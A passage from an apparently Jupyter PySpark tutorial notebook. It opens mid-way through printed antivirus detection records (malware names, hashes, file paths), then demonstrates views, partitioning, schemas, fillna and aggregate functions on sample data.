\\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reset l130 l220 l310 l360 l365 technodand.scr', filepath='F:\\RESET L130 L220 L310 L360 L365 TECHNODAND.SCR', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fb3b95963fbca51b3c7f502365b13513ad711e4a9e3e0bc6c0526c56dbb17752', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1772072, timestamp='2018-11-01T00:20:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja2\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='fb589478efc68e5629aecfba8ec434a4e37e02bd9e9fd99c1cb27b640938dc41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-01T08:41:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mrsb.exe', filepath='\\\\?\\C:\\NAPRO\\PC-SCAN3000 USB\\AIRBAG\\MRSB.exe', filesize=2432000, name='HEUR/APC.#M1.#R1'), hash='fc515f3b119cbcf405c5b61d8497a7f953635dc71d66b8c65577837e505a46c5', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:49:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='arm-apple-darwin9-as.exe', filepath='C:\\Program Files\\Adobe\\Adobe Flash CC\\AIR3.6\\lib\\aot\\bin\\as\\arm-apple-darwin9-as.exe', filesize=544000, name='W32/Sality.AT.#M1.#R1'), hash='fcf28888fdf1634affefb5a7413dc349dcded8a57fec94c2b27e90142a8c4b47', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:23:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='вкр.exe', filepath='C:\\Users\\X\\Desktop\\кнспекты\\вкр\\вкр.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:NlWAMzOFmEG6hVkn.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T15:19:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zipdll.dll', filepath='D:\\DROPSCRIPTV1.8\\EDITOR GAMBAR ( RENAME, WATERMARK, DLL )\\FSViewer64\\ZipDll.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='fd43055f378b3429f3ce0903e2e20d23b0cfb3d7bf4c2bd0bb19e337070c8ba3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0371330.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1593\\A0371330.exe', filesize=1036000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='fdad1548265e9b9f1d7068982308447cdc643fc7291b1ec56bfd1c1a55622d40', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:07:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gwpg_cfg_gen.exe', filepath='C:\\Outils\\SPEC\\SPECworkstation\\gwpg_cfg_gen.exe', filesize=256000, name='HEUR/AGEN.1011424.#M1.#R1'), hash='fde8429696314943c57618161f472977fcddb2edc120d3c903c91ccbdacd079c', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$50EE0,57856,0,C:\\\\\\\\Outils\\\\\\\\SPECworkstation_3\\\\\\\\SPECworkstation_3_Final_4\\\\\\\\SPECworkstation_3.exe\\\\\\" \\\\\\/SPAWNWND=$50F36 \\\\\\/NOTIFYWND=$150924 ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-KR91Q.tmp\\SPECworkstation_3.tmp', parentsize=713728, timestamp='2018-11-01T17:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FDFDF7FDBA20713FFF6CE3FC3F40BC19D3944C51017887291A84BCB28083CD42', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FE479FF96B15ACDD5389B3A0C1FE30C95B5570C629AFD150A3ED2E7BB2E60ACA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe479ff96b15acdd5389b3a0c1fe30c95b5570c629afd150a3ed2e7bb2e60aca', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe75a3573afafb3fdb0a070d0324a8eb30fe8d8e72df144d3ba52433ad9eea8b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FE75A3573AFAFB3FDB0A070D0324A8EB30FE8D8E72DF144D3BA52433AD9EEA8B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe75a3573afafb3fdb0a070d0324a8eb30fe8d8e72df144d3ba52433ad9eea8b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154313-533400a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-154250-4E8D2EB1\\AVSCAN-20181101-154313-533400A5', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:43:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snare.dll', filepath='C:\\Users\\X\\Desktop\\prepa buenavista\\AppData\\Local\\CSHMDR\\Snare.dll', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:42:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~sea1bf.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seA1BF.tmp', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:15:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fec23600f2134bb055ea9ce0e50a33d2b6557e968854c782bb94177db4f4abb7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\FEC23600F2134BB055EA9CE0E50A33D2B6557E968854C782BB94177DB4F4ABB7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fec23600f2134bb055ea9ce0e50a33d2b6557e968854c782bb94177db4f4abb7', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131101-5bda6417', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6bdb048\\AVSCAN-20181101-131043-59F44501\\AVSCAN-20181101-131101-5BDA6417', filesize=384000, name='W2000M/Ramnit.A.#M1.#R1'), hash='feceb360e0dbc19bfab0608db069babb1196286d8dce8f436f3d44ff1ae74ec7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='handout.doc', filepath='E:\\alex 1.11.18\\Bilder\\lloret\\Handout.doc', filesize=384000, name='W2000M/Ramnit.A.#M1.#R1'), hash='feceb360e0dbc19bfab0608db069babb1196286d8dce8f436f3d44ff1ae74ec7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904808, timestamp='2018-11-01T12:10:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FEE5DE47656A3DC8E5E7265FC2B99F61DB429F9311E5B2C87E1011988B705753', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:46:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gkbdrv.dll', filepath='C:\\Program Files\\ISMV5\\Binary\\Gkbdrv.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='ff9e1c0fe64b8bb5b28809da4542db88ce9eb787ba02bde4f18e998b37c3802f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T13:41:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launcher.exe', filepath='C:\\Users\\X\\Desktop\\Alles\\GTA\\client\\launcher.exe', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y3ZY5YdCQ0yHBwXb.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:55:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-015716-0773cfc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d23a290a\\AVSCAN-20181101-015618-FC4F1F9B\\AVSCAN-20181101-015716-0773CFC6', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T00:57:18Z'), dt=datetime.date(2018, 11, 1))]]
In [65]:
df.rdd.getNumPartitions()
Out[65]:
10
In [66]:
df = spark.read.json(path)
In [67]:
df = df.repartition(col("dt"))
In [68]:
df.rdd.getNumPartitions()
Out[68]:
200

6. Union and union all

In [81]:
df = spark.read.json(path)
In [69]:
df1 = df.union(df)
In [71]:
df1.count()
Out[71]:
59298
In [77]:
df1.distinct().count()
Out[77]:
28970

7. Create view on dataframe

Temporary View

Spark session scoped. A local table is not accessible from other clusters (or if using databricks notebook not in other notebooks as well) and is not registered in the metastore.

In [84]:
df.createOrReplaceTempView("data")

Global Temporary View

Spark application scoped, global temporary views are tied to a system preserved temporary database global_temp. This view can be shared across different spark sessions (or if using databricks notebooks, then shared across notebooks).

In [88]:
df.createOrReplaceGlobalTempView("my_global_view")
spark.sql("select * from global_temp.my_global_view").show(3)
spark.read.table("global_temp.my_global_view").show(3)
+--------------------+--------------------+--------------------+----------+
|           detection|                hash|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+
|[wmlaunch.exe, \\...|00a3c546e50bcc946...|[, EG, Windows, 6...|2018-11-02|
|[wmlaunch.exe, \\...|00a3c546e50bcc946...|[, EG, Windows, 6...|2018-11-02|
|[avscan-20181102-...|00eb83e0c976d7e82...|[, BR, Windows, 6...|2018-11-02|
+--------------------+--------------------+--------------------+----------+
only showing top 3 rows

+--------------------+--------------------+--------------------+----------+
|           detection|                hash|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+
|[wmlaunch.exe, \\...|00a3c546e50bcc946...|[, EG, Windows, 6...|2018-11-02|
|[wmlaunch.exe, \\...|00a3c546e50bcc946...|[, EG, Windows, 6...|2018-11-02|
|[avscan-20181102-...|00eb83e0c976d7e82...|[, BR, Windows, 6...|2018-11-02|
+--------------------+--------------------+--------------------+----------+
only showing top 3 rows

Global Permanent View

Persist a dataframe as permanent view. The view definition is recorded in the underlying metastore. You can only create permanent view on global managed table or global unmanaged table. Not allowed to create a permanent view on top of any temporary views or dataframe. Note: Permanent views are only available in SQL API — not available in dataframe API

8. Partition by and bucketing

In [93]:
df.repartition(2).write.partitionBy('dt').parquet("partition")
In [107]:
df.write.bucketBy(1, 'dt').mode("overwrite").saveAsTable('buckets', format='parquet')
In [ ]:
 

9. Create StructType and StructFields

In [108]:
from pyspark.sql.types import StructType,StructField, StringType, IntegerType
In [109]:
data = [("James","","Smith","36636","M",3000),
    ("Michael","Rose","","40288","M",4000),
    ("Robert","","Williams","42114","M",4000),
    ("Maria","Anne","Jones","39192","F",4000),
    ("Jen","Mary","Brown","","F",-1)
  ]
In [110]:
schema = StructType([ \
    StructField("firstname",StringType(),True), \
    StructField("middlename",StringType(),True), \
    StructField("lastname",StringType(),True), \
    StructField("id", StringType(), True), \
    StructField("gender", StringType(), True), \
    StructField("salary", IntegerType(), True) \
  ])
In [111]:
df = spark.createDataFrame(data=data,schema=schema)
In [112]:
df.printSchema()
df.show(truncate=False)
root
 |-- firstname: string (nullable = true)
 |-- middlename: string (nullable = true)
 |-- lastname: string (nullable = true)
 |-- id: string (nullable = true)
 |-- gender: string (nullable = true)
 |-- salary: integer (nullable = true)

+---------+----------+--------+-----+------+------+
|firstname|middlename|lastname|id   |gender|salary|
+---------+----------+--------+-----+------+------+
|James    |          |Smith   |36636|M     |3000  |
|Michael  |Rose      |        |40288|M     |4000  |
|Robert   |          |Williams|42114|M     |4000  |
|Maria    |Anne      |Jones   |39192|F     |4000  |
|Jen      |Mary      |Brown   |     |F     |-1    |
+---------+----------+--------+-----+------+------+

Nested Schema

In [113]:
structureData = [
    (("James","","Smith"),"36636","M",3100),
    (("Michael","Rose",""),"40288","M",4300),
    (("Robert","","Williams"),"42114","M",1400),
    (("Maria","Anne","Jones"),"39192","F",5500),
    (("Jen","Mary","Brown"),"","F",-1)
  ]
In [114]:
structureSchema = StructType([
        StructField('name', StructType([
             StructField('firstname', StringType(), True),
             StructField('middlename', StringType(), True),
             StructField('lastname', StringType(), True)
             ])),
         StructField('id', StringType(), True),
         StructField('gender', StringType(), True),
         StructField('salary', IntegerType(), True)
         ])
In [115]:
df2 = spark.createDataFrame(data=structureData,schema=structureSchema)
In [116]:
df2.printSchema()
df2.show(truncate=False)
root
 |-- name: struct (nullable = true)
 |    |-- firstname: string (nullable = true)
 |    |-- middlename: string (nullable = true)
 |    |-- lastname: string (nullable = true)
 |-- id: string (nullable = true)
 |-- gender: string (nullable = true)
 |-- salary: integer (nullable = true)

+--------------------+-----+------+------+
|name                |id   |gender|salary|
+--------------------+-----+------+------+
|[James, , Smith]    |36636|M     |3100  |
|[Michael, Rose, ]   |40288|M     |4300  |
|[Robert, , Williams]|42114|M     |1400  |
|[Maria, Anne, Jones]|39192|F     |5500  |
|[Jen, Mary, Brown]  |     |F     |-1    |
+--------------------+-----+------+------+

10. fillna() & fill() – Replace NULL Values

In [118]:
filePath="fill_na_example.csv"
df = spark.read.options(header='true', inferSchema='true') \
          .csv(filePath)

df.printSchema()
df.show(truncate=False)
root
 |-- id: integer (nullable = true)
 |-- zipcode: integer (nullable = true)
 |-- type: string (nullable = true)
 |-- city: string (nullable = true)
 |-- state: string (nullable = true)
 |-- population: integer (nullable = true)

+---+-------+--------+-------------------+-----+----------+
|id |zipcode|type    |city               |state|population|
+---+-------+--------+-------------------+-----+----------+
|1  |704    |STANDARD|null               |PR   |30100     |
|2  |704    |null    |PASEO COSTA DEL SUR|PR   |null      |
|3  |709    |null    |BDA SAN LUIS       |PR   |3700      |
|4  |76166  |UNIQUE  |CINGULAR WIRELESS  |TX   |84000     |
|5  |76177  |STANDARD|null               |TX   |null      |
+---+-------+--------+-------------------+-----+----------+

In [119]:
df.fillna(value=0).show()
df.fillna(value=0,subset=["population"]).show()
df.na.fill(value=0).show()
df.na.fill(value=0,subset=["population"]).show()
+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|               null|   PR|     30100|
|  2|    704|    null|PASEO COSTA DEL SUR|   PR|         0|
|  3|    709|    null|       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|               null|   TX|         0|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|               null|   PR|     30100|
|  2|    704|    null|PASEO COSTA DEL SUR|   PR|         0|
|  3|    709|    null|       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|               null|   TX|         0|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|               null|   PR|     30100|
|  2|    704|    null|PASEO COSTA DEL SUR|   PR|         0|
|  3|    709|    null|       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|               null|   TX|         0|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|               null|   PR|     30100|
|  2|    704|    null|PASEO COSTA DEL SUR|   PR|         0|
|  3|    709|    null|       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|               null|   TX|         0|
+---+-------+--------+-------------------+-----+----------+

In [120]:
df.fillna(value="").show()
df.na.fill(value="").show()
+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|                   |   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|                   |   TX|      null|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|                   |   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|                   |   TX|      null|
+---+-------+--------+-------------------+-----+----------+

In [121]:
df.fillna("unknown",["city"]) \
    .fillna("",["type"]).show()
+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|            unknown|   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|            unknown|   TX|      null|
+---+-------+--------+-------------------+-----+----------+

In [122]:
df.fillna({"city": "unknown", "type": ""}) \
    .show()

df.na.fill("unknown",["city"]) \
    .na.fill("",["type"]).show()

df.na.fill({"city": "unknown", "type": ""}) \
    .show()
+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|            unknown|   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|            unknown|   TX|      null|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|            unknown|   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|            unknown|   TX|      null|
+---+-------+--------+-------------------+-----+----------+

+---+-------+--------+-------------------+-----+----------+
| id|zipcode|    type|               city|state|population|
+---+-------+--------+-------------------+-----+----------+
|  1|    704|STANDARD|            unknown|   PR|     30100|
|  2|    704|        |PASEO COSTA DEL SUR|   PR|      null|
|  3|    709|        |       BDA SAN LUIS|   PR|      3700|
|  4|  76166|  UNIQUE|  CINGULAR WIRELESS|   TX|     84000|
|  5|  76177|STANDARD|            unknown|   TX|      null|
+---+-------+--------+-------------------+-----+----------+

11. Spark aggregrate functions

In [124]:
simpleData = [("James", "Sales", 3000),
    ("Michael", "Sales", 4600),
    ("Robert", "Sales", 4100),
    ("Maria", "Finance", 3000),
    ("James", "Sales", 3000),
    ("Scott", "Finance", 3300),
    ("Jen", "Finance", 3900),
    ("Jeff", "Marketing", 3000),
    ("Kumar", "Marketing", 2000),
    ("Saif", "Sales", 4100)
  ]
schema = ["employee_name", "department", "salary"]
In [125]:
df = spark.createDataFrame(data=simpleData, schema = schema)
df.printSchema()
df.show(truncate=False)

print("approx_count_distinct: " + \
      str(df.select(approx_count_distinct("salary")).collect()[0][0]))

print("avg: " + str(df.select(avg("salary")).collect()[0][0]))
root
 |-- employee_name: string (nullable = true)
 |-- department: string (nullable = true)
 |-- salary: long (nullable = true)

+-------------+----------+------+
|employee_name|department|salary|
+-------------+----------+------+
|James        |Sales     |3000  |
|Michael      |Sales     |4600  |
|Robert       |Sales     |4100  |
|Maria        |Finance   |3000  |
|James        |Sales     |3000  |
|Scott        |Finance   |3300  |
|Jen          |Finance   |3900  |
|Jeff         |Marketing |3000  |
|Kumar        |Marketing |2000  |
|Saif         |Sales     |4100  |
+-------------+----------+------+

approx_count_distinct: 6
avg: 3400.0
In [126]:
df.select(collect_list("salary")).show(truncate=False)
+------------------------------------------------------------+
|collect_list(salary)                                        |
+------------------------------------------------------------+
|[3000, 4600, 4100, 3000, 3000, 3300, 3900, 3000, 2000, 4100]|
+------------------------------------------------------------+

In [127]:
df.select(collect_set("salary")).show(truncate=False)
+------------------------------------+
|collect_set(salary)                 |
+------------------------------------+
|[4600, 3000, 3900, 4100, 3300, 2000]|
+------------------------------------+

In [130]:
df2 = df.select(countDistinct("department", "salary"))
df2.show(truncate=False)
+----------------------------------+
|count(DISTINCT department, salary)|
+----------------------------------+
|8                                 |
+----------------------------------+

In [131]:
df.select(first("salary")).show(truncate=False)
+--------------------+
|first(salary, false)|
+--------------------+
|3000                |
+--------------------+

In [132]:
df.select(last("salary")).show(truncate=False)
+-------------------+
|last(salary, false)|
+-------------------+
|4100               |
+-------------------+

In [133]:
df.select(kurtosis("salary")).show(truncate=False)
+-------------------+
|kurtosis(salary)   |
+-------------------+
|-0.6467803030303032|
+-------------------+

In [134]:
df.select(max("salary")).show(truncate=False)
+-----------+
|max(salary)|
+-----------+
|4600       |
+-----------+

In [135]:
df.select(min("salary")).show(truncate=False)
+-----------+
|min(salary)|
+-----------+
|2000       |
+-----------+

In [136]:
df.select(mean("salary")).show(truncate=False)
df.select(variance("salary"),var_samp("salary"),var_pop("salary")) \
  .show(truncate=False)
+-----------+
|avg(salary)|
+-----------+
|3400.0     |
+-----------+

+-----------------+-----------------+---------------+
|var_samp(salary) |var_samp(salary) |var_pop(salary)|
+-----------------+-----------------+---------------+
|586666.6666666666|586666.6666666666|528000.0       |
+-----------------+-----------------+---------------+

12. Drop records containing null

In [137]:
filePath="fill_na_example.csv"
df = spark.read.options(header='true', inferSchema='true') \
          .csv(filePath)

df.printSchema()
df.show(truncate=False)
root
